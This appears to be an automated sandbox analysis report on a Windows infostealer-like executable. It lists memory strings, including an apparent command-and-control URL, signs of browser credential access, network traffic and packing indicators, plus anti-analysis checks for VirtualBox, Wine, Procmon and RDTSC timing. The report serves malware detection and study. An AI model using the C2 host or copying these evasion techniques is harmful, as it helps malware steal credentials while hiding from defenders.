          Source: file.exe, 00000000.00000002.2173989776.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172326210.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172028798.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiC
          Source: file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/c
          Source: file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api
          Source: file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: file.exe, file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.c
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
          Source: file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
          Source: file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
          Source: file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2

          System Summary

          barindex
          PE file contains section with special chars
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0103496C0_3_0103496C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0103496C0_3_0103496C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFB9390_3_00FFB939
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFB9390_3_00FFB939
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFB9390_3_00FFB939
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFB9390_3_00FFB939
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0103496C0_3_0103496C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0103496C0_3_0103496C
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.998114224137931
          Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000000.00000003.2081782731.00000000057F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeReversingLabs: Detection: 39%
          Source: file.exeString found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696426836); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837); user_pref("app.update.lastUpdateTime.xpi-signatur
          Source: file.exeString found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696426836); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837); user_pref("app.update.lastUpdateTime.xpi-signature-v
          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: file.exeString found in binary or memory: i;RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeV
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: file.exeStatic file information: File size 3038208 > 1048576
          Source: file.exeStatic PE information: Raw size of hlkscldd is bigger than: 0x100000 < 0x2ba200

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W;hlkscldd:EW;rdxnvvje:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hlkscldd:EW;rdxnvvje:EW;.taggant:EW;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: file.exeStatic PE information: real checksum: 0x2ed202 should be: 0x2f5a70
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name: hlkscldd
          Source: file.exeStatic PE information: section name: rdxnvvje
          Source: file.exeStatic PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0107CBFA push cs; ret 0_3_0107CC07
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01081821 push cs; retf 0_3_0108183E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0107C090 push ds; ret 0_3_0107C093
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0107CCE1 push ss; ret 0_3_0107CCF9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB68 push 6800FFCBh; retf 0_3_00FFCB6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB68 push 6800FFCBh; retf 0_3_00FFCB6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF68 push 6800FFCFh; iretd 0_3_00FFCF6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF68 push 6800FFCFh; iretd 0_3_00FFCF6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB64 pushad ; retf 0_3_00FFCB65
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB64 pushad ; retf 0_3_00FFCB65
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF64 pushad ; iretd 0_3_00FFCF65
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF64 pushad ; iretd 0_3_00FFCF65
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB60 pushad ; retf 0_3_00FFCB61
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB60 pushad ; retf 0_3_00FFCB61
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF60 pushad ; iretd 0_3_00FFCF61
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF60 pushad ; iretd 0_3_00FFCF61
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB54 push eax; retf 0_3_00FFCB55
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB54 push eax; retf 0_3_00FFCB55
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF54 push eax; iretd 0_3_00FFCF55
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF54 push eax; iretd 0_3_00FFCF55
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB50 push eax; retf 0_3_00FFCB51
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB50 push eax; retf 0_3_00FFCB51
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF50 push eax; iretd 0_3_00FFCF51
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF50 push eax; iretd 0_3_00FFCF51
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB68 push 6800FFCBh; retf 0_3_00FFCB6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB68 push 6800FFCBh; retf 0_3_00FFCB6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF68 push 6800FFCFh; iretd 0_3_00FFCF6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF68 push 6800FFCFh; iretd 0_3_00FFCF6D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB64 pushad ; retf 0_3_00FFCB65
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCB64 pushad ; retf 0_3_00FFCB65
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00FFCF64 pushad ; iretd 0_3_00FFCF65
          Source: file.exeStatic PE information: section name: entropy: 7.981720932479415

          Boot Survival

          barindex
          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Tries to detect sandboxes / dynamic malware analysis system (registry check)
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9847E7 second address: 9847EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E80C second address: 97E811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983E77 second address: 983E9D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1FDD1C1436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1FDD1C1442h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F1FDD1C1436h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983E9D second address: 983EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983FFC second address: 984012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C143Fh 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9859E9 second address: 985A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F1FDD1C1206h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edi, dword ptr [ebp+122D3B65h] 0x00000017 mov edx, dword ptr [ebp+122D38D1h] 0x0000001d push 00000000h 0x0000001f push 8F5002C9h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F1FDD1C1217h 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985A26 second address: 985A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985B07 second address: 985B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985B0D second address: 985B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C143Eh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985C63 second address: 985CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc si, D7BDh 0x00000011 push 00000000h 0x00000013 xor dword ptr [ebp+122D2F96h], esi 0x00000019 call 00007F1FDD1C1209h 0x0000001e jmp 00007F1FDD1C1219h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985CB8 second address: 985CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985CBC second address: 985D73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1FDD1C1210h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jnc 00007F1FDD1C1219h 0x00000017 jmp 00007F1FDD1C1219h 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007F1FDD1C1217h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push ebx 0x00000029 je 00007F1FDD1C121Eh 0x0000002f jmp 00007F1FDD1C1218h 0x00000034 pop ebx 0x00000035 pop eax 0x00000036 mov cl, F5h 0x00000038 mov cl, 80h 0x0000003a push 00000003h 0x0000003c sub dword ptr [ebp+122D3736h], edi 0x00000042 push 00000000h 0x00000044 mov si, dx 0x00000047 push 00000003h 0x00000049 xor dl, 0000007Ah 0x0000004c push FC119D8Dh 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F1FDD1C120Dh 0x00000058 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985D73 second address: 985D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C143Fh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985D86 second address: 985D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97120C second address: 971227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1FDD1C1436h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d je 00007F1FDD1C143Eh 0x00000013 jl 00007F1FDD1C1436h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971227 second address: 97122C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97122C second address: 971249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 jmp 00007F1FDD1C143Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971249 second address: 97127B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1216h 0x00000007 jmp 00007F1FDD1C1213h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97127B second address: 971280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4F98 second address: 9A4FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1FDD1C1206h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A50DC second address: 9A50E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A50E0 second address: 9A50F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A539C second address: 9A53A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A552A second address: 9A5530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5683 second address: 9A568D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1FDD1C1436h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A57F2 second address: 9A580F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1FDD1C1213h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A580F second address: 9A5813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5E35 second address: 9A5E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1FDD1C1214h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5E54 second address: 9A5E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99DED1 second address: 99DEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jno 00007F1FDD1C1206h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007F1FDD1C1206h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c je 00007F1FDD1C1206h 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5FC4 second address: 9A5FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5FCF second address: 9A5FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5FD5 second address: 9A5FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A665E second address: 9A6683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C1218h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F1FDD1C1206h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A682D second address: 9A6831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6831 second address: 9A6837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6837 second address: 9A6841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6841 second address: 9A6851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
